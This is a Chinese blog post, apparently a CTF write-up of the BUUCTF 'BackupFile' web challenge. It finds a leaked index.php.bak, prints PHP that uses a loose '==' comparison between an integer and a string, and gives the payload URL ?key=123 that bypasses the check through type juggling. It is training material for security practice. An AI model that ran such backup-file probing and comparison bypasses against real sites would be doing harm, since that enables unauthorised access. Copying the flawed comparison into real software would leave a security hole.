buuctf(web):[ACTF2020 新生赛]BackupFile

打开链接开了一句话，试着找出源文件!

可以联想到源码泄露，使用扫描工具dirsearch扫描目录，但是由于请求太多所以可能扫不出来，网上查了一下原题，备份文件是index.php.bak。

下载源代码审计

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

首先通过get方式传入一个key,判断key是否为字母或者数字，然后将key取整，如果key==str，则输出flag

playload：http://dbeccd84-a504-47a7-b8ca-5a527a32016e.node4.buuoj.cn:81/?key=123

获得flag

posted @ 2022-01-27 16:24 微草wd 阅读(160) 评论(0) 编辑收藏举报

刷新页面返回顶部

buuctf(web):[ACTF2020 新生赛]BackupFile

公告